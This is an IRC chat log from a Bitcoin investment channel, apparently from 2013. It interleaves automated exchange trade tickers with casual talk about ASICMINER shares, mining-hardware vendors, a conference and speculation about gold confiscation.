stuff coming out of some obese overlord you can live forever on the kernels. May 11 20:51:13 jurov: re: gold: eventually the physical metals market will decouple from the idiot paper-metal chump harvester. That's when the confiscation gasenwagen revvs up. May 11 20:51:36 i don't contend that, only that the govts don't have so complete control than in 20th century and it's maybe easier to cause panic May 11 20:52:05 and not the wimpy FDR confiscation. the Soviet one. where possession of bullion carried the same penalty as murder. May 11 20:52:26 "economic terrorism." May 11 20:52:40 see: http://cluborlov.blogspot.com/2011/04/financial-totalitarianism.html May 11 20:52:41 okay, such thing will certainly not come slowly May 11 20:53:37 jurov: slowly enough. the first step will be punitive taxation of metals (see the imminent U.S. national sales tax as a base to work from.) May 11 20:55:02 that will potentially cause masses of americans start using internet black market May 11 20:55:32 will be interesting whether the surveillance infrastructure will be efficient enough to prevent May 11 20:56:01 jurov: that's when the "Bitcoin as NSA honeypot" hypothesis will be tested until red-hot. May 11 20:56:35 but the fun might end rather abruptly (at least in the U.S.) when the rolling blackouts begin. May 11 20:57:03 [HAVELOCK] [ASICM] 2 @ 0.01512 = 0.0302 BTC [+] May 11 20:58:27 think: lead (and, naturally brass) "bullion" instead of gold and silver. "The lead standard." May 11 20:59:07 rolling blackouts? then any forecasts are off, almost all usual econ activity will cease May 11 20:59:43 jurov: the paper economy, yes. but people will still want to live, and will try. May 11 20:59:53 jurov: ask MP about his gold bus. May 11 21:02:00 jurov: that's when the "Bitcoin as NSA honeypot" hypothesis will be tested until red-hot. <<< ehehe. May 11 21:04:17 you know this is pretty cool, a few people already stated they're coming next year. May 11 21:05:05 [HAVELOCK] [ASICM] 3 @ 0.01512 = 0.0454 BTC [+] May 11 21:06:37 [BTCTC] [B.YABMC] 30 @ 0.012691 = 0.3807 BTC [+] May 11 21:06:49 [BTCTC] [B.YABMC] 1 @ 0.01269 BTC [-] May 11 21:06:54 [BTCTC] [B.YABMC] 10 @ 0.01262 = 0.1262 BTC [-] May 11 21:07:12 [BTCTC] [B.YABMC] 300 @ 0.012607 = 3.7821 BTC [-] May 11 21:07:18 [BTCTC] [B.YABMC] 4 @ 0.012606 = 0.0504 BTC [-] May 11 21:07:23 [BTCTC] [B.YABMC] 40 @ 0.012604 = 0.5042 BTC [-] May 11 21:07:29 [BTCTC] [B.YABMC] 1 @ 0.0126 BTC [-] May 11 21:07:47 [BTCTC] [B.YABMC] 43 @ 0.012501 = 0.5375 BTC [-] May 11 21:10:59 [BTCTC] [TAT.ASICMINER] 4 @ 0.0149 = 0.0596 BTC [+] May 11 21:18:16 [BTCTC] [ASICMINER-PT] 4 @ 1.49998 = 5.9999 BTC [+] May 11 21:19:48 [BTCTC] [PAJKA.BOND] 1 @ 0.1078 BTC [+] May 11 21:20:59 [BTCTC] [ASICMINER-PT] 3 @ 1.49998 = 4.4999 BTC [+] May 11 21:25:00 [BTCTC] [TAT.ASICMINER] 10 @ 0.0149 = 0.149 BTC [+] May 11 21:27:05 [HAVELOCK] [ASICM] 5 @ 0.01499 = 0.075 BTC [-] May 11 21:35:32 [BTCTC] [ASICMINER-PT] 1 @ 1.49 BTC [-] May 11 21:36:35 [BTCTC] [COG.F] 1 @ 2.5 BTC [+] May 11 21:39:37 WTB ASICMINER shares in bulk for a good price, pm with offer May 11 21:39:51 [MPEX] [S.MPOE] 19800 @ 0.00068204 = 13.5044 BTC [+] May 11 21:40:05 wrong nick May 11 21:40:06 WTB ASICMINER shares in bulk for a good price, pm with offer May 11 21:40:56 ThickAsThieves: you do realize you can just /nick nick right? May 11 21:42:05 [HAVELOCK] [SDICE] 2 @ 0.2992 = 0.5984 BTC [-] May 11 21:43:01 yeah May 11 21:43:05 this was faster May 11 21:43:18 typing is so hard May 11 21:44:05 wanna get thicker? May 11 21:44:23 really i just didnt think about it, and mIRC has a nifty connect/disconnect button May 11 21:44:30 all my channels are saved May 11 21:44:33 etc May 11 21:44:36 thicker? May 11 21:48:52 --> ThickerThanThiev has joined this channel May 11 21:49:53 [MPEX] [S.MPOE] 2491 @ 0.00067833 = 1.6897 BTC [-] May 11 21:49:59 ah May 11 21:50:08 i have no answer May 11 21:50:19 more loyal than loyal? May 11 21:51:05 [HAVELOCK] [ASICM] 145 @ 0.01499 = 2.1736 BTC [-] May 11 21:52:05 [HAVELOCK] [ASICM] 91 @ 0.014995 = 1.3645 BTC [+] May 11 21:52:14 i know. no homo. May 11 21:53:04 [HAVELOCK] [ASICM] 259 @ 0.014995 = 3.8837 BTC [+] May 11 21:53:05 [HAVELOCK] [ASICM] 91 @ 0.01512 = 1.3759 BTC [+] May 11 21:53:07 [HAVELOCK] [ASICM] 150 @ 0.01514 = 2.271 BTC [+] May 11 21:53:08 [HAVELOCK] [ASICM] 290 @ 0.01514999 = 4.3935 BTC [+] May 11 21:53:09 [HAVELOCK] [ASICM] 110 @ 0.01515 = 1.6665 BTC [+] May 11 21:53:16 nice May 11 21:53:57 very. how much you made on them? 20% May 11 21:53:58 ? May 11 21:55:13 those werent all me May 11 21:55:18 but calculating my profit May 11 21:55:21 is tough May 11 21:55:32 as I have been reinvesting all earnings May 11 21:55:35 to buy more shares May 11 21:55:43 [BTCTC] [ASICMINER-PT] 2 @ 1.49998 = 3 BTC [+] May 11 21:56:04 [HAVELOCK] [ASICM] 143 @ 0.015145 = 2.1657 BTC [-] May 11 21:56:06 i can say i have yet to sell a share for less than 10% profit May 11 21:56:58 i bought before the recent rally May 11 21:57:30 and sold the whole way May 11 21:57:46 I'd like to get to 5000 shares ASAP May 11 21:57:53 for a board seat May 11 21:58:04 [HAVELOCK] [ASICM] 21 @ 0.015145 = 0.318 BTC [-] May 11 22:01:57 [BTCTC] [S.DICE-PT] 25 @ 0.003444 = 0.0861 BTC [+] May 11 22:02:36 any ideas on pgp libraries for java? May 11 22:03:05 [HAVELOCK] [SDICE] 1 @ 0.30000009 BTC [+] May 11 22:03:13 i just want to (encrypt key message) May 11 22:03:17 waaah May 11 22:06:57 ;;bc,stats May 11 22:07:23 Current Blocks: 235696 | Current Difficulty: 1.0076292883418716E7 | Next Difficulty At Block: 235871 | Next Difficulty In: 175 blocks | Next Difficulty In About: 23 hours, 51 minutes, and 49 seconds | Next Difficulty Estimate: 11107467.1478 | Estimated Percent Change: 10.23367 May 11 22:08:11 benkay, execute pgp externally? May 11 22:08:52 as in shell out to? May 11 22:09:01 i'd rather not. May 11 22:09:07 yes. most libraries do tht anyway May 11 22:09:14 but i may do that anyways. May 11 22:09:58 benkay in case you missed it earlier May 11 22:10:03 http://trilema.com/2013/the-conference-second-edition/ May 11 22:10:05 [BTCTC] [ESECURITYSABTC] 1 @ 0.303172 BTC [-] May 11 22:10:17 [BTCTC] [ESECURITYSABTC] 1 @ 0.303171 BTC [-] May 11 22:10:30 [BTCTC] [ESECURITYSABTC] 1 @ 0.30317 BTC [-] May 11 22:10:37 benkay: bouncy castle May 11 22:10:45 [BTCTC] [ESECURITYSABTC] 5 @ 0.302872 = 1.5144 BTC [-] May 11 22:10:50 [BTCTC] [ESECURITYSABTC] 8 @ 0.3 = 2.4 BTC [-] May 11 22:11:44 [BTCTC] [ASICMINER-PT] 2 @ 1.49998 = 3 BTC [+] May 11 22:16:31 [MPEX] [S.MPOE] 12550 @ 0.0006737 = 8.4549 BTC [-] May 11 22:17:04 [HAVELOCK] [SDICE] 1 @ 0.3 BTC [-] May 11 22:17:41 reptilia does not disappoint: https://bitcointalk.org/index.php?topic=178336.msg2103754#msg2103754 May 11 22:17:46 [BTCTC] [CRYPTO-TRADE] 1 @ 0.18607 BTC [-] May 11 22:17:54 [BTCTC] [CRYPTO-TRADE] 1 @ 0.186 BTC [-] May 11 22:18:00 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1855 = 0.371 BTC [-] May 11 22:18:04 [BTCTC] [CRYPTO-TRADE] 6 @ 0.1832 = 1.0992 BTC [-] May 11 22:18:58 he was here before beginning of time May 11 22:19:35 and had exposure before buying any May 11 22:19:44 well, i like that at least he's claiming to have been following the girl's guidelines. May 11 22:19:54 he's a reptile after all May 11 22:20:00 maybe a dinosaur? May 11 22:20:01 benkay: found http://www.bouncycastle.org/? May 11 22:20:06 oh yah May 11 22:20:11 <[\\\]> mircea_popescu: which hotel? May 11 22:20:12 thanks for responding btw May 11 22:20:15 he was expecting everyone to buiy it up to 100k per btc by xcmas a few weeks ago May 11 22:20:16 <[\\\]> I ain't going if I don't like the digs May 11 22:20:17 np May 11 22:20:20 now he's expecting buy action in 2015 ? May 11 22:20:34 [\\\] depends how many people show up. was nh last time. May 11 22:20:57 <[\\\]> is the girl going? May 11 22:21:14 <[\\\]> I want her to shake my... hand. May 11 22:21:21 mpoe-pr is in the pix lol May 11 22:21:47 <[\\\]> just because she want to the last doesn't mean she's going to the next May 11 22:21:50 [\\\]: she may if you succeed to unchain it May 11 22:21:54 <[\\\]> jesus, basic logic mircea_popescu May 11 22:22:04 well doh, past performance,f uture performance May 11 22:22:06 basic finance. May 11 22:22:26 <[\\\]> jurov: to which it does 'it' refer? May 11 22:22:31 <[\\\]> my hand or her shaker? May 11 22:22:49 omg what a freudian slip.. i meant: May 11 22:22:55 she may if you succeed to unchain her May 11 22:23:11 freudiin slap. May 11 22:23:26 <[\\\]> freud was a fraud May 11 22:23:31 <[\\\]> everyone spells the name wrong May 11 22:24:10 <[\\\]> so I pay the fee and the only issue is my transportation? May 11 22:24:48 yes. and few drinks May 11 22:24:56 sometyhing like that. May 11 22:25:24 <[\\\]> You will be expected to behave courteously towards the other VIPs, which specifically includes not trying to sell them. May 11 22:25:34 <[\\\]> so if I don't VIP, I can trash the VIPs? May 11 22:25:53 <[\\\]> I think I'll just 'register' May 11 22:26:08 oh that catched my attention too... did that actually happened last time? May 11 22:26:23 [BTCTC] [PAJKA.BOND] 1 @ 0.1078 BTC [+] May 11 22:26:33 i didn't notice May 11 22:26:44 <[\\\]> catched->caught May 11 22:26:57 jurov not afaik May 11 22:27:02 so, GPG challenge/response at the gates? May 11 22:27:25 [\\\]: i guess VIPs will have bouncers at disposal for such cases as you May 11 22:28:04 asciilifeform possibly. May 11 22:28:22 <[\\\]> jurov: oh be nice May 11 22:28:32 hahaha yea we need protection against impostors, too.. but last time pgp challenge/response was done by email May 11 22:28:47 <[\\\]> all flights take me through germany May 11 22:28:51 <[\\\]> I don't know if I can handle that May 11 22:29:07 [BTCTC] [ASICMINER-PT] 1 @ 1.4811 BTC [-] May 11 22:29:17 [\\\]: try to go to budapest, we can make road trip then May 11 22:29:21 [BTCTC] [ASICMINER-PT] 6 @ 1.481 = 8.886 BTC [-] May 11 22:29:27 [BTCTC] [ASICMINER-PT] 1 @ 1.4801 BTC [-] May 11 22:29:29 <[\\\]> like I want to road trip with you May 11 22:29:38 [BTCTC] [ASICMINER-PT] 1 @ 1.48 BTC [-] May 11 22:29:43 [BTCTC] [ASICMINER-PT] 1 @ 1.475178 BTC [-] May 11 22:29:48 [BTCTC] [ASICMINER-PT] 8 @ 1.475 = 11.8 BTC [-] May 11 22:29:49 <[\\\]> have you seen what happens when you get into a car with strangers? May 11 22:30:16 so we should know each other more bby then. May 11 22:30:30 [BTCTC] [ASICMINER-PT] 5 @ 1.475 = 7.375 BTC [-] May 11 22:30:44 [BTCTC] [ASICMINER-PT] 2 @ 1.47252 = 2.945 BTC [-] May 11 22:30:46 <[\\\]> perhaps you aren't my type? May 11 22:31:13 we 'll manage these 4 hours somehow May 11 22:31:25 [BTCTC] [ASICMINER-PT] 1 @ 1.4725 BTC [-] May 11 22:31:47 [BTCTC] [ASICMINER-PT] 1 @ 1.47 BTC [-] May 11 22:32:07 [BTCTC] [ASICMINER-PT] 1 @ 1.465 BTC [-] May 11 22:32:12 oh google maps actually says three hours only May 11 22:32:20 [BTCTC] [ASICMINER-PT] 1 @ 1.4625 BTC [-] May 11 22:32:31 [BTCTC] [ASICMINER-PT] 1 @ 1.460475 BTC [-] May 11 22:32:40 push that price down! May 11 22:32:40 [BTCTC] [ASICMINER-PT] 1 @ 1.460474 BTC [-] May 11 22:32:48 [BTCTC] [ASICMINER-PT] 1 @ 1.460356 BTC [-] May 11 22:32:58 [BTCTC] [ASICMINER-PT] 14 @ 1.46026 = 20.4436 BTC [-] May 11 22:33:07 <[\\\]> so what price do we think AM is going to top out at? May 11 22:33:08 [BTCTC] [ASICMINER-PT] 7 @ 1.46025 = 10.2218 BTC [-] May 11 22:33:21 [BTCTC] [ASICMINER-PT] 10 @ 1.46 = 14.6 BTC [-] May 11 22:33:22 hard to say May 11 22:33:28 next dividend is gonna be big May 11 22:33:33 [BTCTC] [ASICMINER-PT] 1 @ 1.46 BTC [-] May 11 22:33:42 [BTCTC] [ASICMINER-PT] 1 @ 1.46 BTC [-] May 11 22:33:57 [BTCTC] [ASICMINER-PT] 1 @ 1.46 BTC [-] May 11 22:34:20 [BTCTC] [ASICMINER-PT] 4 @ 1.459 = 5.836 BTC [-] May 11 22:34:21 about now May 11 22:35:09 [BTCTC] [ASICMINER-PT] 1 @ 1.456 BTC [-] May 11 22:35:30 <[\\\]> ThickAsThieves, why's that? May 11 22:35:31 [BTCTC] [ASICMINER-PT] 1 @ 1.45513 BTC [-] May 11 22:35:33 jurov, i'll ride in with you May 11 22:35:56 [BTCTC] [ASICMINER-PT] 1 @ 1.455 BTC [-] May 11 22:35:56 because they sold 50 blades at 50btc last night May 11 22:36:05 [HAVELOCK] [ASICM] 115 @ 0.015 = 1.725 BTC [-] May 11 22:36:12 and at current hashrate the div payout will be more than .015/share May 11 22:36:17 [BTCTC] [ASICMINER-PT] 1 @ 1.455 BTC [-] May 11 22:36:41 [BTCTC] [ASICMINER-PT] 1 @ 1.4502 BTC [-] May 11 22:36:41 mircea_popescu: actually, it won't be bad idea to say on invitation "you can search connection to budapest, there will be a shuttle at XX:00 hour" May 11 22:36:45 so .02 is quite possible May 11 22:37:12 <[\\\]> diffchange is right around the corner May 11 22:37:24 [BTCTC] [ASICMINER-PT] 1 @ 1.450125 BTC [-] May 11 22:37:35 benkay ok, let me know in january :) May 11 22:37:45 [BTCTC] [ASICMINER-PT] 6 @ 1.45 = 8.7 BTC [-] May 11 22:38:02 [BTCTC] [ASICMINER-PT] 1 @ 1.45 BTC [-] May 11 22:38:13 .02 is like 70% APR May 11 22:38:16 [BTCTC] [TAT.ASICMINER] 4 @ 0.0149 = 0.0596 BTC [+] May 11 22:38:45 at share price of 1.5 May 11 22:39:24 <[\\\]> .02 won't hold May 11 22:39:33 maybe not May 11 22:39:54 <[\\\]> every 12 days, they'd have to deploy more than what diff is going up May 11 22:39:55 but certainly will drive up price May 11 22:40:13 <[\\\]> and the more they deploy, the more they have to deploy later to keep up May 11 22:40:18 <[\\\]> there are diminishing returns May 11 22:40:45 yep May 11 22:40:46 <[\\\]> and at some point, the others will ship May 11 22:40:51 but they arent dumb either May 11 22:40:54 <[\\\]> which only makes things more difficult May 11 22:41:04 <[\\\]> I never said they were dumb May 11 22:41:11 i never said you did ;) May 11 22:41:13 <[\\\]> but there are limits to the tech May 11 22:41:25 <[\\\]> at some point, they'll hit moore's just like the rest of the industry May 11 22:41:25 maybe they have new tech planned May 11 22:41:38 <[\\\]> I look forward to that day May 11 22:41:41 new products to sell May 11 22:41:42 jurov so make a comment on the article May 11 22:41:55 other types of deals May 11 22:41:58 <[\\\]> selling products hurts their generation side May 11 22:42:00 maybe the branch out May 11 22:42:01 <[\\\]> so that has limits :p May 11 22:42:15 they sell products right at about the price where they cant achive ROI May 11 22:42:25 achieve May 11 22:42:28 <[\\\]> sorta like bfl May 11 22:42:31 indeed. May 11 22:42:35 [BTCTC] [CRYPTO-TRADE] 1 @ 0.182004 BTC [-] May 11 22:42:36 <[\\\]> only bfl's gone way past ROI May 11 22:42:54 <[\\\]> if you bought in June/July, you'll never get your original coin qty back May 11 22:43:03 criminal May 11 22:43:17 <[\\\]> well, part of that was risk May 11 22:43:20 <[\\\]> you can't place it all on bfl May 11 22:43:24 <[\\\]> but the outright lies you can May 11 22:44:05 [HAVELOCK] [SDICE] 2 @ 0.2992 = 0.5984 BTC [-] May 11 22:44:06 [HAVELOCK] [SDICE] 2 @ 0.2991 = 0.5982 BTC [-] May 11 22:44:26 [BTCTC] [PAJKA.BOND] 38 @ 0.1078 = 4.0964 BTC [+] May 11 22:45:09 [BTCTC] [PAJKA.BOND] 50 @ 0.1079 = 5.395 BTC [+] May 11 22:45:27 <[\\\]> is bfl still processing refunds for people? May 11 22:45:59 dunno May 11 22:46:02 um May 11 22:46:06 i know they refunded me in Feb May 11 22:46:22 aren't they still marketing for people to take preorders with them? May 11 22:46:31 i swear once a weeks there' a new trick to preorder with bfl May 11 22:46:50 <[\\\]> the newest preorders say no refunds May 11 22:46:53 <[\\\]> all sales final May 11 22:47:05 <[\\\]> I was curious about the presales from last year May 11 22:47:09 BitHub, didnt you have some insider info about secret BFL machines? Spill it! May 11 22:47:27 about one yeah May 11 22:47:45 and after seeing what's going on i'm not suprised if its true May 11 22:48:53 but if i was to go on their website and order one now, when will i get it? May 11 22:48:58 christmas? May 11 22:49:13 [BTCTC] [PAJKA.BOND] 10 @ 0.107999 = 1.08 BTC [+] May 11 22:49:40 in two weeks. May 11 22:49:49 tops. May 11 22:49:51 [BTCTC] [PAJKA.BOND] 2 @ 0.1089 = 0.2178 BTC [+] May 11 22:50:01 serious? May 11 22:50:05 hehe dont joke May 11 22:50:59 btw, what do yo guys make of this asset, im very curious, very different May 11 22:51:04 https://bitcointalk.org/index.php?topic=200701.0 May 11 22:51:32 [BTCTC] [PAJKA.BOND] 148 @ 0.1089 = 16.1172 BTC [+] May 11 22:51:56 I'd love to be wrong May 11 22:51:59 but May 11 22:52:05 if it ain't a scam May 11 22:52:10 it's a delusion May 11 22:52:13 lulz May 11 22:52:25 i'm thinking to go there for a week and check it out May 11 22:52:33 really investigate it May 11 22:52:34 good idea, May 11 22:52:39 then they'll buy you off May 11 22:52:43 to lie to everyone May 11 22:52:48 [BTCTC] [PAJKA.BOND] 1 @ 0.109 BTC [+] May 11 22:52:48 you'll make some good $ May 11 22:53:02 we'll see May 11 22:53:21 assuming it's legit May 11 22:53:32 how are bitcoiners remotely qualified to invest in it May 11 22:53:37 i wont be investing myself if its not legit May 11 22:53:51 [BTCTC] [PAJKA.BOND] 214 @ 0.109 = 23.326 BTC [+] May 11 22:53:57 [BTCTC] [PAJKA.BOND] 10 @ 0.109 = 1.09 BTC [+] May 11 22:54:04 potentially this could be worth way more than asicminer in my opinion May 11 22:54:26 [BTCTC] [PAJKA.BOND] 1 @ 0.109 BTC [+] May 11 22:54:59 holy shit May 11 22:55:03 never invest in mining companies May 11 22:55:14 ^^ personal opinion May 11 22:55:36 bitcoin mining *may* be different. May 11 22:55:47 to be honest May 11 22:55:56 that was one of the things i was goign to talk to them about May 11 22:56:01 and hook them up with May 11 22:56:08 to do crypto mining at the same time May 11 22:56:08 BitHub, someone linked this the other day, which you might find useful: http://www.cerm3.mining.ubc.ca/documents/areviewofrecentminingstockscams.pdf May 11 22:56:32 i admit at first and the youtube vid it does seems very scammy May 11 22:56:32 BitHub, they'd look at you like you are crazy May 11 22:56:42 and they might be right May 11 22:56:44 :) May 11 22:56:59 just a lil crazy but there's alot of genius mixed in May 11 22:57:26 but i dont know, i will check this out May 11 23:03:05 [HAVELOCK] [ASICM] 25 @ 0.01499999 = 0.375 BTC [-] May 11 23:04:04 [HAVELOCK] [SDICE] 1 @ 0.2992 BTC [+] May 11 23:05:05 [HAVELOCK] [SDICE] 3 @ 0.2991 = 0.8973 BTC [-] May 11 23:06:05 [HAVELOCK] [ASICM] 50 @ 0.01499999 = 0.75 BTC [-] May 11 23:08:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.0149 BTC [+] May 11 23:13:27 [MPEX] [S.MPOE] 123 @ 0.00067001 = 0.0824 BTC [-] May 11 23:13:32 [MPEX] [S.MPOE] 10000 @ 0.00067 = 6.7 BTC [-] May 11 23:13:38 [MPEX] [S.MPOE] 5577 @ 0.00066753 = 3.7228 BTC [-] May 11 23:15:38 [MPEX] [S.DICE] 308 @ 0.00325 = 1.001 BTC [+] May 11 23:18:09 [BTCTC] [ASICMINER-PT] 1 @ 1.4899 BTC [+] May 11 23:19:08 [BTCTC] [ASICMINER-PT] 1 @ 1.4919 BTC [+] May 11 23:20:08 [BTCTC] [ASICMINER-PT] 1 @ 1.492 BTC [+] May 11 23:20:50 [BTCTC] [ASICMINER-PT] 49 @ 1.492 = 73.108 BTC [+] May 11 23:21:30 [BTCTC] [BASIC-MINING] 1 @ 0.420001 BTC [-] May 11 23:21:40 [MPEX] [S.DICE] 310 @ 0.00312 = 0.9672 BTC [-] May 11 23:21:42 [MPEX] [S.DICE] 400 @ 0.0031 = 1.24 BTC [-] May 11 23:22:59 [BTCTC] [ASICMINER-PT] 1 @ 1.49997 BTC [+] May 11 23:23:15 [BTCTC] [ASICMINER-PT] 14 @ 1.499975 = 20.9997 BTC [+] May 11 23:23:18 [BTCTC] [TAT.ASICMINER] 28 @ 0.0149 = 0.4172 BTC [+] May 11 23:28:43 WTB Bulk ASICMINER shares, also interested in a steady supplier if anyone is interested. May 11 23:36:20 [BTCTC] [ASICMINER-PT] 1 @ 1.4925 BTC [-] May 11 23:37:06 [BTCTC] [ASICMINER-PT] 1 @ 1.495 BTC [+] May 11 23:37:58 [BTCTC] [ASICMINER-PT] 1 @ 1.49998 BTC [+] May 11 23:41:30 [BTCTC] [TAT.ASICMINER] 3 @ 0.0149 = 0.0447 BTC [+] May 11 23:42:41 [BTCTC] [TAT.ASICMINER] 15 @ 0.01494 = 0.2241 BTC [+] May 11 23:44:16 [MPEX] [S.MPOE] 6162 @ 0.00066753 = 4.1133 BTC [-] May 11 23:44:23 [MPEX] [S.MPOE] 14416 @ 0.00066691 = 9.6142 BTC [-] May 11 23:44:25 [MPEX] [S.MPOE] 292 @ 0.00066648 = 0.1946 BTC [-] May 11 23:45:07 lol http://www.nypost.com/p/news/business/terminally_nosy_p5pSzsDkZzWJ2H7SqpFAPO May 11 23:45:42 Bloombers spies on Goldman Sachs May 11 23:47:32 [MPEX] [S.MPOE] 43699 @ 0.00067063 = 29.3059 BTC [+] May 11 23:47:34 [MPEX] [S.MPOE] 11600 @ 0.00068208 = 7.9121 BTC [+] May 11 23:47:36 [MPEX] [S.MPOE] 18819 @ 0.00068917 = 12.9695 BTC [+] May 11 23:47:36 [MPEX] [S.MPOE] 5500 @ 0.00069081 = 3.7995 BTC [+] May 11 23:47:37 [MPEX] [S.MPOE] 2824 @ 0.00069228 = 1.955 BTC [+] May 11 23:47:39 [MPEX] [S.MPOE] 5922 @ 0.00069321 = 4.1052 BTC [+] May 11 23:47:40 [MPEX] [S.MPOE] 6960 @ 0.00070342 = 4.8958 BTC [+] May 11 23:47:49 [MPEX] [S.MPOE] 4676 @ 0.00070702 = 3.306 BTC [+] May 11 23:48:04 [MPEX] [S.MPOE] 4321 @ 0.00070683 = 3.0542 BTC [-] May 11 23:48:06 [MPEX] [S.MPOE] 17424 @ 0.00070702 = 12.3191 BTC [+] May 11 23:49:00 [MPEX] [S.MPOE] 10000 @ 0.00071 = 7.1 BTC [+] May 11 23:49:47 [MPEX] [S.MPOE] 14000 @ 0.00071 = 9.94 BTC [+] May 11 23:50:57 time to hack bloomberg May 11 23:51:20 [MPEX] [S.MPOE] 4255 @ 0.00071 = 3.0211 BTC [+] May 11 23:52:49 [BTCTC] [S.DICE-PT] 124 @ 0.003 = 0.372 BTC [-] May 11 23:53:06 [BTCTC] [S.DICE-PT] 7 @ 0.003 = 0.021 BTC [-] May 11 23:53:16 [BTCTC] [S.DICE-PT] 700 @ 0.0029 = 2.03 BTC [-] May 11 23:54:05 [HAVELOCK] [SDICE] 3 @ 0.2991 = 0.8973 BTC [-] May 11 23:54:06 [HAVELOCK] [SDICE] 1 @ 0.2901 BTC [-] May 11 23:54:07 [HAVELOCK] [SDICE] 6 @ 0.29 = 1.74 BTC [-] May 11 23:55:38 [MPEX] [S.DICE] 1000 @ 0.0029001 = 2.9001 BTC [-] May 11 23:56:54 [MPEX] [S.DICE] 51666 @ 0.0029 = 149.8314 BTC [-] May 11 23:56:58 [BTCTC] [TAT.ASICMINER] 10 @ 0.01494 = 0.1494 BTC [+] May 11 23:59:05 [HAVELOCK] [ASICM] 92 @ 0.01475 = 1.357 BTC [-] May 11 23:59:07 [HAVELOCK] [ASICM] 8 @ 0.01474 = 0.1179 BTC [-] May 11 23:59:24 [BTCTC] [TAT.ASICMINER] 50 @ 0.014994 = 0.7497 BTC [+] May 12 00:00:34 [BTCTC] [TAT.ASICMINER] 8 @ 0.01469 = 0.1175 BTC [-] May 12 00:01:15 [BTCTC] [TAT.ASICMINER] 20 @ 0.01468 = 0.2936 BTC [-] May 12 00:04:55 [BTCTC] [PAJKA.BOND] 1 @ 0.109998 BTC [+] May 12 00:07:39 [BTCTC] [ASICMINER-PT] 1 @ 1.471001 BTC [-] May 12 00:07:47 [BTCTC] [ASICMINER-PT] 1 @ 1.471 BTC [-] May 12 00:07:53 [BTCTC] [ASICMINER-PT] 1 @ 1.47 BTC [-] May 12 00:08:04 [BTCTC] [ASICMINER-PT] 1 @ 1.465 BTC [-] May 12 00:10:02 [BTCTC] [PAJKA.BOND] 9 @ 0.109998 = 0.99 BTC [+] May 12 00:10:46 just 10k s.dice to 0.002 May 12 00:12:40 hi May 12 00:13:57 heya May 12 00:14:25 MJR_ is a big star now https://bitcointalk.org/index.php?topic=202145.0 May 12 00:16:07 [BTCTC] [B.YABMC] 7 @ 0.015879 = 0.1112 BTC [+] May 12 00:16:15 lol May 12 00:16:25 the forums completely ignored it May 12 00:16:31 0 comments May 12 00:16:36 forums aint shit. May 12 00:16:45 your name's actually Maximo? May 12 00:16:48 hold on May 12 00:16:51 yes it is May 12 00:16:59 Maximo Joshua Rossi May 12 00:17:19 <-----makes sense now :) May 12 00:17:54 i was accually dislecit for a long time May 12 00:18:01 and called you MR. J in my head May 12 00:20:58 coolness May 12 00:21:11 MJR_ the forums are retarded. May 12 00:21:20 https://bitcointalk.org/index.php?topic=56587.0;topicseen May 12 00:21:42 super old post from my bit coin noob days May 12 00:21:42 mircea_popescu: I agree May 12 00:22:17 lmao "hai i want to mine with nvidia" May 12 00:23:46 https://bitcointalk.org/index.php?topic=196613.0 May 12 00:24:08 that was jan 2012 May 12 00:24:24 [BTCTC] [TAT.ASICMINER] 8 @ 0.01498 = 0.1198 BTC [+] May 12 00:24:43 so look at how much the forums did there May 12 00:25:12 :p May 12 00:25:13 whois self May 12 00:26:19 whois greatideas May 12 00:27:35 anyway, meeting Stephen foley, financial times today May 12 00:27:42 I showed him trilema May 12 00:27:54 and the best BTC investments of all time May 12 00:28:17 we talked diff futures, IPO's, options... May 12 00:28:31 I told him that there was a story no ones really ran with May 12 00:28:49 we'll discuss more tonight over drinks May 12 00:29:00 lol, have you told him about mpoe-pr? May 12 00:29:04 [BTCTC] [ASICMINER-PT] 1 @ 1.489999 BTC [+] May 12 00:29:11 that *will* be a story May 12 00:29:20 no...lol in what way? May 12 00:29:23 [BTCTC] [TAT.ASICMINER] 18 @ 0.01499 = 0.2698 BTC [+] May 12 00:29:23 [BTCTC] [ASICMINER-PT] 2 @ 1.489999 = 2.98 BTC [+] May 12 00:29:47 -tomaw- [Global Notice] Hi all. We're just completing some administrative tasks after services extended tea break. They'll return shortly. Sorry for the outage! May 12 00:29:52 jurov just likes her May 12 00:29:53 she can be featured in a box next to story as "most reviled PR ever or so" May 12 00:29:54 nickserv is ded? May 12 00:30:05 mod6_ atm May 12 00:30:19 ahh thx May 12 00:30:22 :] May 12 00:31:11 I love her responses May 12 00:31:41 and admire her for being able to stand writing on that hell hole of a forum May 12 00:32:41 now on that later part i fully agree May 12 00:32:49 tingirl. May 12 00:32:50 ahahahaha May 12 00:33:15 tingirl? May 12 00:33:40 well some metal May 12 00:33:42 let's do nice holiday surprise for her (if she's in the US) May 12 00:33:59 [BTCTC] [TAT.ASICMINER] 11 @ 0.01499 = 0.1649 BTC [+] May 12 00:34:05 [HAVELOCK] [HIM] 5 @ 2.4899 = 12.4495 BTC [+] May 12 00:34:12 it's a holiday atm ? May 12 00:34:24 you said she's on vacation, no? May 12 00:34:52 she only got a coupla days lol May 12 00:34:59 heh May 12 00:35:03 what do you think this is, socialism ?! May 12 00:35:36 vacation = socialism May 12 00:35:41 deep May 12 00:36:09 totally. May 12 00:37:17 man i can't handle "vacation" May 12 00:37:32 being idle is the worst May 12 00:37:39 [BTCTC] [ASICMINER-PT] 1 @ 1.489999 BTC [+] May 12 00:38:59 see ? May 12 00:40:33 now i see why some people can't call longer vacation a vacation, they instead say "mini-retirement" May 12 00:41:05 [HAVELOCK] [ASICM] 8 @ 0.01474 = 0.1179 BTC [-] May 12 00:41:06 [HAVELOCK] [ASICM] 5 @ 0.01474 = 0.0737 BTC [-] May 12 00:41:08 [HAVELOCK] [ASICM] 4 @ 0.014735 = 0.0589 BTC [-] May 12 00:41:09 [HAVELOCK] [ASICM] 10 @ 0.014732 = 0.1473 BTC [-] May 12 00:41:10 [HAVELOCK] [ASICM] 1 @ 0.01473 BTC [-] May 12 00:41:11 [HAVELOCK] [ASICM] 8 @ 0.0147226 = 0.1178 BTC [-] May 12 00:41:12 [HAVELOCK] [ASICM] 6 @ 0.01472 = 0.0883 BTC [-] May 12 00:41:13 [HAVELOCK] [ASICM] 6 @ 0.01471 = 0.0883 BTC [-] May 12 00:41:14 [HAVELOCK] [ASICM] 23 @ 0.0147 = 0.3381 BTC [-] May 12 00:41:15 [HAVELOCK] [ASICM] 729 @ 0.01461 = 10.6507 BTC [-] May 12 00:47:38 ;;ticker May 12 00:49:48 I will go on a mini retirement week after next May 12 00:49:59 [MPEX] [S.DICE] 1000 @ 0.00287001 = 2.87 BTC [-] May 12 